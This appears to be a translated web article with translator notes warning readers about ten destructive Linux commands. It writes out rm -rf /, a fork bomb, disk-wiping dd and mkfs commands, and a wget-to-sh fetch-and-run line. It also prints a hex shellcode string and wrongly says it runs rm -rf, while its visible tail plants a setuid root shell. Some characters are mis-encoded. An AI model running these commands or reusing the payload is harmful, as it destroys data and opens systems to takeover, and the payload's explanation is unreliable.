10 Most Dangerous Commands You Should Never Run on Linux

          The Linux command line is useful, efficient, and fun, but it can also be dangerous, especially when you are unsure of what you are doing. This article is not meant to incite anger towards Linux or the Linux command line. We simply want to make you aware that you should think twice before running certain commands. (Note: Of course, the following commands usually require root privileges to cause irreparable damage; under a normal user account, you can only destroy your own little corner of the system.)

1. The rm -rf Command

The rm -rf command is one of the fastest ways to delete a folder and its contents. Just a tiny typo or a bit of ignorance can lead to irreversible system damage. Here are some options for the rm command.

  • rm is commonly used in Linux to delete files.
  • rm -r recursively deletes directories, even empty ones. (Note: This likely should state “even non-empty folders” based on common knowledge.)
  • rm -f forcefully deletes ‘read-only files’ without prompting. (Note: In Linux, deleting a file does not depend on whether the file itself is read-only, but rather on whether the parent directory has write permission. The -f flag simply means “don’t ask for confirmation for each deletion; just silently remove everything.” Also, the original rm command does not prompt for deletion by default, but most distributions alias rm to include the -i flag for confirmation, which -f suppresses.)
  • rm -rf / : Forcefully deletes everything under the root directory. (Meaning, after it finishes, nothing is left…)
  • rm -rf *: Forcefully deletes all files in the current directory.
  • rm -rf . : Forcefully deletes the current directory and its subdirectories.

From now on, please be careful when executing the rm -rf command. We can create an alias for the rm command as rm -i in the “.bashrc” file to prevent accidents when deleting files, as it will ask you to confirm every deletion request. (Note: Most distributions already do this. If yours hasn’t, please do so, and always think carefully before using the -f flag! The translator has painful, firsthand experience with this lesson.)

2. The :(){:|:&};: Command

This is an example of a fork bomb. The operation works by defining a function called ‘:’, which calls itself twice, once in the foreground and once in the background. It repeats this execution until the system crashes.

:(){:|:&};:

Oh? Are you sure you want to try this? Definitely don’t experiment on a company’s production server~~

3. command > /dev/sda

The command above writes the output of a ‘command‘ to the block device /dev/sda. This operation replaces all data blocks on the block device with the raw data written by the command, causing total data loss on the entire device.

4. mv folder /dev/null

This command moves a ‘folder‘ to /dev/null. In Linux, /dev/null or the null device is a special file where all data written to it is discarded, and the write operation returns successfully. (Note: Think of it as a black hole. However, it should be noted that moving a folder to the black hole does not prevent data recovery software from rescuing it. True, complete destruction requires specialized software or techniques鈥擨 know you probably have things you want to delete completely.)

# mv /home/user/* /dev/null

The command above moves all contents of the User directory to /dev/null, meaning everything is ‘sucked’ into the black hole (null).

5. wget http://malicious_source -O- | sh

The command above downloads a script from a (potentially) malicious source and executes it. The Wget command downloads the script, and sh executes the downloaded script (unconditionally).

Note: You should always pay attention to the source of your downloaded packages or scripts. Only use scripts/programs downloaded from trusted sources. (Note: So, do you really know what you are doing? When faced with such a need, my approach is to wget it down first, then read through what it actually contains, and then decide whether to execute it.)

6. mkfs.ext3 /dev/sda

The command above formats the block device ‘sda‘. You undoubtedly know that after executing the above command, your block device (hard drive) will be formatted, looking brand new! With no data left, it brings your system directly to an unrecoverable state. (Note: You usually wouldn’t use a device like /dev/sda directly unless it’s used as a raw device. Generally, you partition sda into partitions like sda1, sda2 before using them. However, whether you use sda or sda1, running mkfs on a block device or partition is destructive; all data on it will be vaporized.)

7. > file

The command above is commonly used to clear file contents (Note: It is also often used to record command output. However, before executing, confirm that the output file is empty or doesn’t exist yet, otherwise the original file is truly unrecoverable鈥攅ven data recovery software might not be able to help you. Also, I think what you might actually want is “>>”, which appends new output to the file, rather than overwriting it.). If this command is executed with a typo or through ignorance, such as entering “> xt.conf“, it can overwrite configuration files or any other critical system configuration files.

8. ^foo^bar

This command, described in our article Ten Lesser-Known Linux Commands – Part 3, is used to edit a previously run command without retyping the entire line. But when using the foobar command without thoroughly checking the risk of changing the original command, it can lead to real trouble. (Note: In fact, the translator considers this little trick one of the few useless and harmful “hacker” techniques left over from a bygone era.)

9. dd if=/dev/random of=/dev/sda

The command above writes random junk data to the block device sda, thereby wiping the data. Of course! Your system might fall into a chaotic and unrecoverable state. (Note: Remember earlier how we said moving files to the black hole doesn’t completely delete the data? This command gives you a way to thoroughly delete them! For extra security, you can overwrite multiple times.)

10. The Hidden Command

The command below is essentially the first command above (rm -rf). The code here is hidden in hexadecimal, and an unknowing user might be fooled. Running the following command in a terminal could erase your root partition.

This command shows that real danger is often hidden and not easily detected. You must always pay attention to what you are doing and what the results will be. Do not compile/run code from unknown sources.

char esp[] __attribute__ ((section(“.text”))) /* e.s.prelease */= “/xeb/x3e/x5b/x31/xc0/x50/x54/x5a/x83/xec/x64/x68″“/xff/xff/xff/xff/x68/xdf/xd0/xdf/xd9/x68/x8d/x99″“/xdf/x81/x68/x8d/x92/xdf/xd2/x54/x5e/xf7/x16/xf7″“/x56/x04/xf7/x56/x08/xf7/x56/x0c/x83/xc4/x74/x56″“/x8d/x73/x08/x56/x53/x54/x59/xb0/x0b/xcd/x80/x31″“/xc0/x40/xeb/xf9/xe8/xbd/xff/xff/xff/x2f/x62/x69″“/x6e/x2f/x73/x68/x00/x2d/x63/x00″“cp -p /bin/sh /tmp/.beyond; chmod 4755/tmp/.beyond;”;

Note: Do not execute any of the above commands in the Linux terminal or shell on your computer, your classmate’s, or your school’s. If you want to test them, please run them in a virtual machine. The article author and Tecmint are not responsible for any disharmony or data

Leave a Comment

Your email address will not be published.